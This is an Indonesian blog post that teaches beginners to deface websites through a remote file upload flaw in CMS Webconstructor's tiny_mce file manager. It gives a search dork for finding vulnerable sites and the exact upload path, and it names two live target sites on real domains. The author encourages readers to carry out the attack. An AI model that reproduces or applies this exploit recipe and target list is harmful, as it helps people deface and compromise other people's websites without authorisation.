Cara Deface Metode CMS Webconstructor Remote File Upload

Cara Deface Metode CMS Webconstructor Remote File Upload

InfoGaes.Com Assalamualaikum Gaes 🙂 Ketemu sama saya lagi nih hhehe, kali ini saya mau share tutorial deface yang ajib lagi untuk pemula yang masih baru mau belajar cara melakukan teknik deface pada sebuah website, yaitu “CMS Webconstructor Remote File Upload Vulnerability”semoga bermanfaat ya karena saya yakin tutorial saya bermanfaat semua nya hhaha. Ok simak berikut ini.

===============================================
Exploit Title: CMS Webconstructor Remote File Upload Vulnerability
Dork: intext:CMS: webconstructor.pl
Author: BadBoy
Category: Remote, Webapps
Tested on: Windows Xp SP3
===============================================
-> Exploit <-
http://[localhost]/PATH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
-> Allowed File <-
You can upload ,html ,pdf ,ppt ,txt ,doc ,jpg, etc except php, php4, asp
-> Preview <-
– You can see if you success upload file.
-> Live Target <-
– http://mexico-extreme.com/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
– http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
===============================================
Sudah cukup begitu, saya rasa kalian sudah mengerti bagaimana cara eksekusi nya hehe, kalau yang bingung? Komen aja di bawah, InsyaAllah saya feedback dengan cepat 😉
Semoga bermanfaat aja ya, Wassalamualaikum

Belum ada Komentar untuk "Cara Deface Metode CMS Webconstructor Remote File Upload"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel